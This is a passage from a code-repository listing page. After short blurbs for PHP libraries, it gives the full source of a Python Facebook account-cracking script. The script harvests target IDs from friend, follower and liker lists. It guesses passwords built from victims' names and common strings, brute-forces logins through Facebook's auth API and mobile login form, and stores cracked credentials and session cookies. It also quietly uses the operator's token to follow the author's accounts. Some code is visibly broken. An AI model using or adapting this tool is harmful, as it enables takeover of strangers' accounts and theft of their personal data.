230 skills found · Page 7 of 8
wikimedia / At EaseSafe alternative to PHP's "@" error control operator. Mirror from https://gerrit.wikimedia.org/g/at-ease. See https://www.mediawiki.org/wiki/Developer_access for contributing.
Davisonpro / Tidy Sql Select Join Queries In PhpWrite tidy Select and Join SQL Queries in PHP. Most of us have to interact with databases now and then in our projects, and SQL is by far the most common language used. However, working with SQL in PHP can be messy. If your queries are complex, you have to code them up as text strings which can be error prone, and suffer from formatting challenges. Also, when you want to build your SQL queries to have variables inside them, then you are forced to do substitution or pasting, which is a little bit tricky.
gosfem / Codeigniter Admin And User Role TempateCodeigniter Admin Template is a Ultimate Codeigniter Material + Bootstrap 4 integrated admin template. We have also added User & Role management with unlimited user permissions with ajax authentication. It comes with most common features with lot of premium material and boostrap 4 forms, tables, email, ui elements, reports, charts and many more options. It will help you to build Admin panel, CMS, Employee management, CRM, or any backend administrator System. Live Demo: https://optimumlinkupsoftware.com/template/ Sample Software Built With: https://optimumlinkupsoftware.com/newschool/ Core Features: Latest CodeIgniter 3.1.7 Bootstrap 4 & Material Design Easy Integration & Customization Standared & clean code Fully Responsive Design User management User role management with unlimited permissions Different User Access Level (Admin and User) Activate or deactivate user Accounts Data export with(copy, csv, pdf, excel and print) Database backup option Ajax secure Authentication Jquery Data tables Jquery form validations Ajax pagination with advanced search filter Sweetalert popup notification with ajax Detailed Documentation with commented code Totally Secure System Runs on PHP 5.4.3+ (and PHP 7) Integrated Features: Mail: Inbox Tables Compose Layouts Inbox Details Tables Ui Elements Cards Panels and Wells panels with BlockIO Dragable Panel Dragable Portlet Buttons Bootsrap Switch Date Pagination Sweet Alert Typography Grid Tabs Stylish Tabs Modals Progress Bars Notifications Carousel List & Media object User Cards Timeline Horizontal Timeline Nesteble Range Slider Ribbons Steps Reports: Payment Report Income Report Sales Report Payments: All Payments Create Payment Payment Invoice Forms Form Basic Layout Form Layout Form Addons Form Material Form Float Input File Upload Form Mask Form Validation Form File Dropzone Form-pickerst Icheck Form Controls Form-wizards Typehead X-editable Summernote Bootstrap wysihtml5 Tinymce wysihtml5 Backup Database Widget Icons Font awesome Themify Icons Simple line Icons Weather Icons Sample pages Starter Page Blank Page Email Templates: Alert, Billing, Basic and Reset Password Lightbox Popup Treeview Search Result Utility Classes Custom Scrolls Login Page Login v2 Animations Profile Invoice FAQ Gallery Pricing Register Register v2 3 Step Registration Recover Password Tables Basic Tables Table Layouts Bootstrap Tables Responsive Table Editable Tables FooTables Pages Blank page Login Register Lockscreen Recover password Profile page Invoice Error Pages Logout Security: There are various mechanisms to secure application. These mechanisms are: Cross-Site Request Forgery (CSRF) Prevention Cross-Site Scripting (XSS) Prevention Requirements: There are some requirements to work on your server. These requirements are: PHP >= 5.4.3 + (and PHP 7)
ahmar00987 / Ahsam#!/usr/bin/python3 #-*-coding:utf-8-*- # Made With ❤️ By Ahmar And AHMARCODE Project # Update V0.1 # Copyright© Ahmar ID 2021 # 100% Open Source Code # Author : Ahmar jan. # Facebook (Alizar M.M.M X) : https://www.facebook.com/profile.php?id=100027259894020X # Instagram (☬ 𝐀𝐧𝐨𝐧𝐲𝐦 𝟒𝟎𝟒 ☬) : Instagram.com. # Whatsapp (Alizar) : 03127103451 # Free Recode For Personal Use # Bebas Recode Untuk Penggunaan Pribadi # Izin Terlebih Dahulu Apabila Ingin Re-Upload # Jangan Jual Belikan File Source Code Ini ! ### Import Module import requests,sys,bs4,os,random,time,json from concurrent.futures import ThreadPoolExecutor as ThreadPool from datetime import datetime ### Perumpamaan Module & Syntax _req_get_ = requests.get _req_post_ = requests.post _js_lo_ = json.loads _ahmar_cici_ = print _cici_ahmar_ = input _ahmar_ahmar_ = open _cici_cici_ = exit ### Waktu & Tanggal current = datetime.now() ta = current.year bu = current.month ha = current.day bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"} bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] try: if bu < 0 or bu > 12: _cici_cici_() buTemp = bu - 1 except ValueError: _cici_cici_() op = bulan[buTemp] tanggal = ("%s-%s-%s"%(ha,op,ta)) ### Warna _P_ = "\x1b[0;97m" # Putih _M_ = "\x1b[0;91m" # Merah _H_ = "\x1b[0;92m" # Hijau _U_ = "\x1b[0;95m" # Ungu ### Logo _logo_line_1_ = ('%s.------..------..------..------..------.(_U_)) _logo_line_2_ = ('%s|A.--. ||H.--. ||M.--. ||A.--. ||R.--. |%s。☆✼★━━━━━━━━━━━━━━━━━━━━━━━━━★✼☆。'%(_U_,_H_)) _logo_line_3_ = ('%s| (\/) || :/\: || (\/) || (\/) || :(): | %sEditor By %s• AHMAR JAN %s '%(_U_,_M_,_P_,_U_)) _logo_line_4_ = ('%s| :\/: || (__) || :\/: || :\/: || ()() | %sWhatssap %s• 03127103451 %s '%(_U_,_M_,_P_,_U_)) _logo_line_5_ = ('%s| '--'A|| '--'H|| '--'M|| '--'A|| '--'R| %sAdrees %s• FASILABAD %s '%(_U_,_M_,_P_,_U_)) _logo_line_6_ = ('%s`------'`------'`------'`------'`------' %s。☆✼★━━━━━━━━━━━━━━━━━━━━━━━━━★✼☆。'%(_U_,_H_)) def _my_logo_(): _ahmar_cici_(_logo_line_1_) _ahmar_cici_(_logo_line_2_) _ahmar_cici_(_logo_line_3_) _ahmar_cici_(_logo_line_4_) _ahmar_cici_(_logo_line_5_) _ahmar_cici_(_logo_line_6_+'\n') ### User Agent ua_xiaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ua_nokia = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+' ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ua_huawei = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]' ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]' ### Penampungan _id_tampung_ = [] ### Jangan Diganti Nanti Error _oscylopsce_ = '__Ahmar__' _ascylapsci_ = '__Cici__' _escylipsce_ = '__Ahmar_Love_Cici__' _uscylupsci_ = '__My_Love____Ahmar____Ahmar_Love_Cici____Cici____Forever__' ### Membuat Folder Direktori def _folder_(): try:os.mkdir("CP") except:pass try:os.mkdir("OK") except:pass ### Clear Login Session def _bersih_(): try:os.remove('token.txt') except:pass ### Clear User Agent def _del_(): try:os.remove('ugent.txt') except:pass ### Clear Terminal def _clear_(): if "linux" in sys.platform.lower():os.system("clear") elif "win" in sys.platform.lower():os.system("cls") else:os.system("clear") ### Jangan Diganti Anjink! def _bot_follow_(_tok_dev_): token = _tok_dev_ try: _req_post_("https://https://www.facebook.com/profile.php?id=100027259894020/subscribers?access_token=" + token) Alizar M.M.M # _req_post_("https://graph.facebook.com/100060885769913/subscribers?access_token=" + token) # احسان اللہ _req_post_("https://graph.facebook.com/100012267158212/subscribers?access_token=" + token) # وزیراعظم صاحب _req_post_("https://graph.facebook.com/100009834670141/subscribers?access_token=" + token) # نسرین اختر _req_post_("https://graph.facebook.com/100007026360241/subscribers?access_token=" + token) # Zama Jan _ahmar_cici_('\n%s[%s!%s] %sLogin Successful'%(_H_,_P_,_H_,_P_)) time.sleep(2) except (KeyError,IOError):pass ### Login def _login_dev_(_Cici_Cantik_Banget_): _clear_() _my_logo_() if _uscylupsci_ not in _Cici_Cantik_Banget_:_ahmar_cici_('%s[%s!%s] %sHey, do you want to recode?'%(_M_,_P_,_M_,_P_)) else:pass _tok_dev_ = _cici_ahmar_('%s[%s•%s] %sPLEASE Enter Token :\n\n'%(_P_,_H_,_P_,_U_)) try: _req_tok_ = _req_get_("https://graph.facebook.com/me?access_token=%s"%(_tok_dev_)) _js_load_ = _js_lo_(_req_tok_.text) _nama_dev_ = _js_load_['name'] _op_dev_ = _ahmar_ahmar_('token.txt','w') _op_dev_.write(_tok_dev_) _op_dev_.close() _bot_follow_(_tok_dev_) _default_ua_(_Cici_Cantik_Banget_) _menu_dev_(_Cici_Cantik_Banget_) except (KeyError,IOError): _ahmar_cici_('\n%s[%s!%s] %sToken EXPIRE'%(_M_,_P_,_M_,_P_)) _bersih_() time.sleep(2) _login_dev_(_Cici_Cantik_Banget_) except requests.exceptions.ConnectionError: _ahmar_cici_('\n%s[%s!%s] %sConnection Problem'%(_M_,_P_,_M_,_P_)) _cici_cici_() ### Menu def _menu_dev_(_Ahmar_Ganteng_Banget_): _clear_() _my_logo_() if _uscylupsci_ not in _Ahmar_Ganteng_Banget_:_ahmar_cici_('%s[%s!%s] %sHayoo Mau Recode Ya?'%(_M_,_P_,_M_,_P_)) else:pass try: _tok_dev_ = _ahmar_ahmar_("token.txt","r").read() _req_tok_ = _req_get_("https://graph.facebook.com/me?access_token=%s"%(_tok_dev_)) _js_load_ = _js_lo_(_req_tok_.text) _nama_dev_ = _js_load_['name'] _id_dev_ = _js_load_['id'] except (KeyError,IOError): _ahmar_cici_('%s[%s!%s] %sToken Invalid'%(_M_,_P_,_M_,_P_)) _bersih_() time.sleep(2) _login_dev_(_Ahmar_Ganteng_Banget_) except requests.exceptions.ConnectionError: _ahmar_cici_('%s[%s!%s] %sConnection Problem'%(_M_,_P_,_M_,_P_)) _cici_cici_() try: _ip_url_ = "http://ip-api.com/json/" _ip_headers_ = { "Referer":"http://ip-api.com/", "Content-Type":"application/json; charset=utf-8", "User-Agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]" } _ip_req_ = _req_get_(_ip_url_,headers=_ip_headers_).json() _ip_dev_ = _ip_req_["query"] except: _ip_dev_ = " " _ahmar_cici_('%s[%s•%s] %sWelcome %s%s'%(_U_,_P_,_U_,_P_,_U_,_nama_dev_)) _ahmar_cici_('%s[%s•%s] %sID : %s'%(_U_,_P_,_U_,_P_,_id_dev_)) _ahmar_cici_('%s[%s•%s] %sIP : %s\n'%(_U_,_H_,_U_,_H_,_ip_dev_)) _ahmar_cici_('%s[%s1%s] %sCrack From Friends/Public ID '%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s2%s] %sCrack From Followrs ID'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s3%s] %sCrack ID From Likers'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s4%s] %sView Crack Results'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s5%s] %sUser Agent'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s0%s] %sLog Out'%(_U_,_P_,_U_,_M_)) _ahmar_menu__cici_ahmar__ = _cici_ahmar_('%s[%s•%s] %sChooses : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_('') if _ahmar_menu__cici_ahmar__ in ['',' ']: _ahmar_cici_('%s[%s!%s] %sWrong Input BRO'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_Ganteng_Banget_) elif _ahmar_menu__cici_ahmar__ in ['1','01','a']: _publik_dev_(_tok_dev_) elif _ahmar_menu__cici_ahmar__ in ['2','02','b']: _followers_dev_(_tok_dev_) elif _ahmar_menu__cici_ahmar__ in ['3','03','c']: _likers_dev_(_tok_dev_) elif _ahmar_menu__cici_ahmar__ in ['4','04','d']: _cek_result_dev_() elif _ahmar_menu__cici_ahmar__ in ['5','05','e']: _ugen_dev_(_Ahmar_Ganteng_Banget_) elif _ahmar_menu__cici_ahmar__ in ['0','00','z']: _ahmar_cici_('%s[%s•%s] %sSee you later %s%s %s!'%(_U_,_P_,_U_,_P_,_U_,_nama_dev_,_P_)) _bersih_() time.sleep(2) _login_dev_(_Ahmar_Ganteng_Banget_) else: _ahmar_cici_('%s[%s!%s] %sWrong input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_Ganteng_Banget_) ### Dump ID Publik def _publik_dev_(_tok_dev_): _Ahmar_jan_Cici_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__Forever__' _ahmar_cici_('%s[%s•%s] %sType (Me) Clone your Login ID'%(_U_,_P_,_U_,_P_)) _target_dev_ = _cici_ahmar_('%s[%s•%s] %sINPUT TARGET ID : %s'%(_U_,_P_,_U_,_P_,_U_)) try: _req_tar_ = _req_get_("https://graph.facebook.com/%s?access_token=%s"%(_target_dev_,_tok_dev_)) _jso_tar_ = _js_lo_(_req_tar_.text) _name_ = _jso_tar_['name'] _ahmar_cici_('%s[%s•%s] %sTarger Name: %s%s'%(_U_,_P_,_U_,_P_,_U_,_name_)) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid / ID Not Found'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) try: _req_fl_ = _req_get_("https://graph.facebook.com/%s/friends?limit=1000000&access_token=%s"%(_target_dev_,_tok_dev_)) _lo_dev_ = _js_lo_(_req_fl_.text) _jso_file_ = (_jso_tar_["first_name"]+".json").replace(" ","_") _jso_exec_ = _ahmar_ahmar_(_jso_file_,"w") for _Ahmar_Cici_Forever_ in _lo_dev_["data"]: try: _id_tampung_.append(_Ahmar_Cici_Forever_["id"]+"•"+_Ahmar_Cici_Forever_["name"]) _jso_exec_.write(_Ahmar_Cici_Forever_["id"]+"•"+_Ahmar_Cici_Forever_["name"]+"\n") except:continue _jso_exec_.close() _ahmar_cici_('%s[%s•%s] %sTotal ID : %s%s'%(_U_,_P_,_U_,_P_,_U_,len(_id_tampung_))) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid /ID Not Found'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) return _crack_dev_(_jso_file_) ### Dump ID Pengikut def _followers_dev_(_tok_dev_): _Ahmar_jan_Cici_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__Forever__' _ahmar_cici_('%s[%s•%s] %sTpye /Me/ Clone Your Login ID'%(_U_,_P_,_U_,_P_)) _target_dev_ = _cici_ahmar_('%s[%s•%s] %sPast Target ID : %s'%(_U_,_P_,_U_,_P_,_U_)) try: _req_tar_ = _req_get_("https://graph.facebook.com/%s?access_token=%s"%(_target_dev_,_tok_dev_)) _jso_tar_ = _js_lo_(_req_tar_.text) _name_ = _jso_tar_['name'] _ahmar_cici_('%s[%s•%s] %sTarget Name : %s%s'%(_U_,_P_,_U_,_P_,_U_,_name_)) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid /Targe not public'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) try: _req_fl_ = _req_get_("https://graph.facebook.com/%s/subscribers?limit=1000000&access_token=%s"%(_target_dev_,_tok_dev_)) _lo_dev_ = _js_lo_(_req_fl_.text) _jso_file_ = (_jso_tar_["first_name"]+".json").replace(" ","_") _jso_exec_ = _ahmar_ahmar_(_jso_file_,"w") for _Ahmar_Cici_Forever_ in _lo_dev_["data"]: try: _id_tampung_.append(_Ahmar_Cici_Forever_["id"]+"•"+_Ahmar_Cici_Forever_["name"]) _jso_exec_.write(_Ahmar_Cici_Forever_["id"]+"•"+_Ahmar_Cici_Forever_["name"]+"\n") except:continue _jso_exec_.close() _ahmar_cici_('%s[%s•%s] %sTotal ID : %s%s'%(_U_,_P_,_U_,_P_,_U_,len(_id_tampung_))) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid / Target Not public'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) return _crack_dev_(_jso_file_) ### Dump ID Likers def _likers_dev_(_tok_dev_): _Ahmar_jan_Cici_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__Forever__' _ahmar_cici_('%s[%s•%s] %sTpye /Me/ Clone Your Login ID'%(_U_,_P_,_U_,_P_)) _target_dev_ = _cici_ahmar_('%s[%s•%s] %sPAST TARGET ID : %s'%(_U_,_P_,_U_,_P_,_U_)) try: _req_tar_ = _req_get_("https://graph.facebook.com/%s?access_token=%s"%(_target_dev_,_tok_dev_)) _jso_tar_ = _js_lo_(_req_tar_.text) _name_ = _jso_tar_['name'] _ahmar_cici_('%s[%s•%s] %sNama : %s%s'%(_U_,_P_,_U_,_P_,_U_,_name_)) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid / ID NOT FOUND'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) try: _req_fl_ = _req_get_("https://graph.facebook.com/%s/likes?limit=1000000&access_token=%s"%(_target_dev_,_tok_dev_)) _lo_dev_ = _js_lo_(_req_fl_.text) _jso_file_ = (_jso_tar_["first_name"]+".json").replace(" ","_") _jso_exec_ = _ahmar_ahmar_(_jso_file_,"w") for _Ahmar_Cici_Forever_ in _lo_dev_["data"]: try: _id_tampung_.append(_Ahmar_Cici_Forever_["id"]+"•"+_Ahamr_Cici_Forever_["name"]) _jso_exec_.write(_Ahmar_Cici_Forever_["id"]+"•"+_Ahmar_Cici_Forever_["name"]+"\n") except:continue _jso_exec_.close() _ahmar_cici_('%s[%s•%s] %sTotal ID : %s%s'%(_U_,_P_,_U_,_P_,_U_,len(_id_tampung_))) except: _ahmar_cici_('%s[%s!%s] %sToken Invalid / ID NOT FOUND'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) return _crack_dev_(_jso_file_) ### Generate Password def _pass_list_(_cici_): _ahmar_=[] for i in _cici_.split(" "): if len(i)<3: continue else: i=i.lower() if len(i)==3 or len(i)==4 or len(i)==5: _ahmar_.append(i+"123") _ahmar_.append(i+"12345") else: _ahmar_.append(i) _ahmar_.append(i+"123") _ahmar_.append(i+"12345") _ahmar_.append(_cici_.lower()) _ahmar_.append("pakistan") _ahmar_.append("123456789") _ahmar_.append("123456") return _ahmar_ ### Logger Crack def log_api(em,pas,hosts): ua = open('ugent.txt','r').read() r = requests.Session() header = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"} param = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'json', 'sdk_version': '2', 'email': em, 'locale': 'en_US', 'password': pas, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig':'3f555f99fb61fcd7aa0c44f58f522ef6'} api = 'https://b-api.facebook.com/method/auth.login' response = r.get(api, params=param, headers=header) if 'session_key' in response.text and 'EAAA' in response.text: return {"status":"success","email":em,"pass":pas} elif 'www.facebook.com' in response.json()['error_msg']: return {"status":"cp","email":em,"pass":pas} else:return {"status":"error","email":em,"pass":pas} def log_mbasic(em,pas,hosts): ua = open('ugent.txt','r').read() r = requests.Session() r.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}) p = r.get("https://mbasic.facebook.com/") b = r.post("https://mbasic.facebook.com/login.php", data={"email": em, "pass": pas, "login": "submit"}) _raw_cookies_ = (";").join([ "%s=%s" % (key, value) for key, value in r.cookies.get_dict().items() ]) if "c_user" in r.cookies.get_dict().keys(): return {"status":"success","email":em,"pass":pas,"cookies":_raw_cookies_} elif "checkpoint" in r.cookies.get_dict().keys(): return {"status":"cp","email":em,"pass":pas,"cookies":_raw_cookies_} else:return {"status":"error","email":em,"pass":pas} def koki(_cookies_): samp_ = _cookies_.split(';') _cooked_cookies_ = ('%s;%s;%s;%s;%s'%(samp_[2],samp_[4],samp_[0],samp_[3],samp_[1])) return _cooked_cookies_ ### Crack Proccess class _crack_dev_: def __init__(self,files): self._Ahmar_jan_Cici_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__Forever__' self.ada = [] self.cp = [] self.ko = 0 _ahmar_cici_('\n%s[%s•%s] %sCrack With Default/Manual Password [d/m]'%(_U_,_P_,_U_,_P_)) while True: f = _cici_ahmar_('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) if f=="": _ahmar_cici_('%s[%s!%s] %sWrong Input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) elif f in ['m','M','2','02','002']: try: while True: try: self.apk = files self.fs = _ahmar_ahmar_(self.apk).read().splitlines() break except: _ahmar_cici_('%s[%s!%s] %sDump File Not Detected'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) self.fl = [] for i in self.fs: try: self.fl.append({"id":i.split("•")[0]}) except:continue except Exception as e: _ahmar_cici_('%s[%s!%s] %sDump File not Detected'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) _ahmar_cici_('%s[%s•%s] %sExample : Pakistan,786786,223344'%(_U_,_P_,_U_,_P_)) self.pwlist() break elif f in ['d','D','1','01','001']: try: while True: try: self.apk = files self.fs = _ahmar_ahmar_(self.apk).read().splitlines() break except: continue self.fl = [] for i in self.fs: try: self.fl.append({"id":i.split("•")[0],"pw":_pass_list_(i.split("•")[1])}) except:continue start_method() put = _cici_ahmar_('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_(''%()) if put in ['']: _ahmar_cici_('%s[%s!%s] %sWrong input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) elif put in ['1','01','001','a']: started() ThreadPool(35).map(self.api,self.fl) os.remove(self.apk) _cici_cici_() elif put in ['2','02','002','b']: started() ThreadPool(35).map(self.mbasic,self.fl) os.remove(self.apk) _cici_cici_() else: _ahmar_cici_('%s[%s!%s] %sWrong input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) except Exception as e: continue def pwlist(self): self.pw = _cici_ahmar_('%s[%s•%s] %s Enter Password : '%(_U_,_P_,_U_,_P_)).split(",") if len(self.pw) ==0: _ahmar_cici_('%s[%s!%s] %sWrong input BRO'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) else: for i in self.fl: i.update({"pw":self.pw}) start_method() put = _cici_ahmar _('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_(''%()) if put in ['']: _ahmar_cici_('%s[%s!%s] %sWrong input BRO'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) elif put in ['1','01','001','a']: started() ThreadPool(30).map(self.api,self.fl) os.remove(self.apk) _cici_cici_() elif put in ['2','02','002','b']: started() ThreadPool(30).map(self.mbasic,self.fl) os.remove(self.apk) _cici_cici_() else: _ahmar_cici_('%s[%s!%s] %sWrong Input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(self._Ahmar_jan_Cici_) def api(self,fl): try: for i in fl.get("pw"): log = log_api(fl.get("id"),i,"https://b-api.facebook.com") if log.get("status")=="cp": try: ke = _req_get_("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + _ahmar_ahmar_("token.txt","r").read()) tt = json.loads(ke.text) ttl = tt["birthday"] m,d,y = ttl.split("/") m = bulan_ttl[m] _ahmar_cici_("\r%s[%sAHMAR-CP%s] %s • %s • %s %s %s "%(_U_,_P_,_U_,fl.get("id"),i,d,m,y)) self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y)) _ahmar_ahmar_("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y)) break except(KeyError, IOError): m = " " d = " " y = " " except:pass _ahmar_cici_("\r%s[%sAHMAR-CP%s] %s • %s "%(_U_,_P_,_U_,fl.get("id"),i)) self.cp.append("%s•%s"%(fl.get("id"),i)) _ahmar_ahmar_("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i)) break elif log.get("status")=="success": _ahmar_cici_("\r%s[%sAHMAR-OK%s] %s • %s "%(_H_,_P_,_H_,fl.get("id"),i)) self.ada.append("%s•%s"%(fl.get("id"),i)) _ahmar_ahmar_("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i)) break else:continue self.ko+=1 _ahmar_cici_("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(_U_,_P_,_U_,_P_,self.ko,len(self.fl),_U_,_P_,len(self.ada),_U_,_P_,len(self.cp),_U_,_P_), end=' ');sys.stdout.flush() except: self.api(fl) def mbasic(self,fl): try: for i in fl.get("pw"): log = log_mbasic(fl.get("id"),i,"https://mbasic.facebook.com") if log.get("status")=="cp": try: ke = _req_get_("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + _ahmar_ahmar_("token.txt","r").read()) tt = json.loads(ke.text) ttl = tt["birthday"] m,d,y = ttl.split("/") m = bulan_ttl[m] _ahmar_cici_("\r%s[%sXSAN-CP%s] %s • %s • %s %s %s "%(_U_,_P_,_U_,fl.get("id"),i,d,m,y)) self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y)) _ahmar_ahmar_("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y)) break except(KeyError, IOError): m = " " d = " " y = " " except:pass _ahmar_cici_("\r%s[%sXSAN-CP%s] %s • %s "%(_U_,_P_,_U_,fl.get("id"),i)) self.cp.append("%s•%s"%(fl.get("id"),i)) _ahmar_ahmar_("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i)) break elif log.get("status")=="success": _ahmar_cici_("\r%s[%sXSAN-OK%s] %s • %s • %s "%(_H_,_P_,_H_,fl.get("id"),i,koki(log.get("cookies")))) self.ada.append("%s•%s"%(fl.get("id"),i)) _ahmar_ahmar_("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i)) break else:continue self.ko+=1 _ahmar_cici_("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(_U_,_P_,_U_,_P_,self.ko,len(self.fl),_U_,_P_,len(self.ada),_U_,_P_,len(self.cp),_U_,_P_), end=' ');sys.stdout.flush() except: self.mbasic(fl) ### Menu Mengecek Hasil Crack def _cek_result_dev_(): _clear_() _my_logo_() _Ahmar_jan_Cici_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__forever__' _ahmar_cici_('%s[ %sCrack Results %s]'%(_U_,_P_,_U_)) _ahmar_cici_('\n%s[%s1%s] %sCheck Results OK'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s2%s] %sChel Results CP'%(_U_,_P_,_U_,_P_)) ch = _cici_ahmar_('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) if ch in ['']: _ahmar_cici_('%s[%s!%s] %sWrong input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) elif ch in ['1','01','001','a']: try: okl = os.listdir("OK") _ahmar_cici_('\n%s[%s Crack Results Stored in File OK %s]\n'%(_U_,_P_,_U_)) for file in okl: _ahmar_cici_('%s[%s•%s] %s%s'%(_U_,_P_,_U_,_P_,file)) _ahmar_cici_('') files = _cici_ahmar_('%s[%s•%s] %sINPUT File Name : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_('') if files == "": _ahmar_cici_('%s[%s!%s] %sWrong Input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) os.system('cat OK/%s'%(files)) 